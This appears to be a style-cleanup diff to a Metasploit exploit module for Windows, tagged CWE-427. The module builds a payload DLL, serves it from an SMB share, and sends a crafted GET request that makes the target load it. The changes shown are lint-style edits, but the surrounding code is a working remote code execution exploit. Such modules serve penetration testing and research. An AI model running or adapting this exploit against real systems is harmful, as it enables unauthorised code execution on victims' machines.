@@ -26,7 +26,6 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'Platform' => 'win',
         'Privileged' => false,
-        'Arch' => [ARCH_X86, ARCH_X64],
         'Stance' => Msf::Exploit::Stance::Aggressive,
         'Payload' => {
           'Space' => 2048,
@@ -36,7 +35,7 @@ class MetasploitModule < Msf::Exploit::Remote
           ['CWE', '427']
         ],
         'DefaultOptions' => {
-          'EXITFUNC' => 'thread',
+          'EXITFUNC' => 'thread'
         },
         'Targets' => [
           [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
@@ -67,7 +66,7 @@ class MetasploitModule < Msf::Exploit::Remote
     super
 
     self.file_contents = generate_payload_dll
-    self.file_name = datastore['FILE_NAME'] || "#{Rex::Text.rand_text_alpha(4 + rand(3))}.dll"
+    self.file_name = datastore['FILE_NAME'] || "#{Rex::Text.rand_text_alpha(rand(4..6))}.dll"
     print_status("File available on #{unc}...")
   end
 
@@ -75,7 +74,7 @@ class MetasploitModule < Msf::Exploit::Remote
     sploit = target_uri.to_s
     sploit << unc
 
-    print_status("Trying to ")
+    print_status('Trying to ')
     send_request_raw({
       'method' => 'GET',
       'uri' => sploit
@@ -83,10 +82,8 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    begin
-      Timeout.timeout(datastore['SMB_DELAY']) { super }
-    rescue Timeout::Error
-      # do nothing... just finish exploit and stop smb server...
-    end
+    Timeout.timeout(datastore['SMB_DELAY']) { super }
+  rescue Timeout::Error
+    # do nothing... just finish exploit and stop smb server...
   end
 end
